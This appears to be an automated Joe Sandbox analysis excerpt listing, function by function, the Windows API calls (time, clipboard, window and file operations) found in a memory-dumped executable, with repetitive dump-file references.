Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427765, Relevance: 9.2, APIs: 6, Instructions: 181time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426341, Relevance: 9.2, APIs: 6, Instructions: 180time

APIs

Part of subcall function 00433C70: GetWindowRect.USER32(00000000,?), ref: 00433D48
Part of subcall function 00433C70: GetWindowRect.USER32(00000000,?), ref: 00433D7A
Part of subcall function 00433C70: GetParent.USER32(00000000), ref: 00433DA5
Part of subcall function 00433C70: ScreenToClient.USER32(00000000,80000000), ref: 00433DB5
Part of subcall function 00433C70: MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 00433E5A

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042705C, Relevance: 9.2, APIs: 6, Instructions: 180time

APIs

Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 004519FD
Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451A38
Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A6D
Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A80
Part of subcall function 004519E0: SHFileOperation.SHELL32 ref: 00451B58

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042701F, Relevance: 9.2, APIs: 6, Instructions: 180time

APIs

Part of subcall function 00451E00: GetFullPathNameA.KERNEL32(004987E9,00000104,?,00000002,00000002), ref: 00451E20
Part of subcall function 00451E00: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451E62
Part of subcall function 00451E00: GetFileAttributesA.KERNEL32(?), ref: 00451E99
Part of subcall function 00451E00: GetFileAttributesA.KERNEL32(?), ref: 00451ED1
Part of subcall function 00451E00: FindFirstFileA.KERNEL32(?,?), ref: 00451F0A
Part of subcall function 00451E00: GetLastError.KERNEL32 ref: 00451F19
Part of subcall function 00451E00: __wsplitpath.LIBCMT ref: 00451F67
Part of subcall function 00451E00: GetTickCount.KERNEL32 ref: 00451FB0
Part of subcall function 00451E00: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00451FD7
Part of subcall function 00451E00: GetTickCount.KERNEL32 ref: 00451FED
Part of subcall function 00451E00: MoveFileA.KERNEL32(?,?), ref: 00452082
Part of subcall function 00451E00: DeleteFileA.KERNEL32(?), ref: 0045209D
Part of subcall function 00451E00: MoveFileA.KERNEL32(?,?), ref: 004520B7
Part of subcall function 00451E00: GetLastError.KERNEL32 ref: 004520C1
Part of subcall function 00451E00: CopyFileA.KERNEL32(?,?,00000000), ref: 004520EB
Part of subcall function 00451E00: GetLastError.KERNEL32 ref: 004520F5
Part of subcall function 00451E00: FindNextFileA.KERNEL32(?,00000010), ref: 0045210E
Part of subcall function 00451E00: FindClose.KERNEL32(?), ref: 00452121

Part of subcall function 0042D3E0: __itow.LIBCMT ref: 0042D40E

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425D5B, Relevance: 9.2, APIs: 6, Instructions: 180time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425DA0, Relevance: 9.2, APIs: 6, Instructions: 179time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427388, Relevance: 9.2, APIs: 6, Instructions: 179time

APIs

Part of subcall function 00451410: CoInitialize.OLE32 ref: 00451428
Part of subcall function 00451410: CoCreateInstance.OLE32(00496770,00000000,00000001,00496760,00000000), ref: 00451441
Part of subcall function 00451410: GetKeyboardLayout.USER32(00000000), ref: 004514F0
Part of subcall function 00451410: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00451594
Part of subcall function 00451410: CoUninitialize.OLE32 ref: 004515E5

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426266, Relevance: 9.2, APIs: 6, Instructions: 178time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426500, Relevance: 9.2, APIs: 6, Instructions: 177time

APIs

Part of subcall function 00434CB0: _strncpy.LIBCMT ref: 00434CF4

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
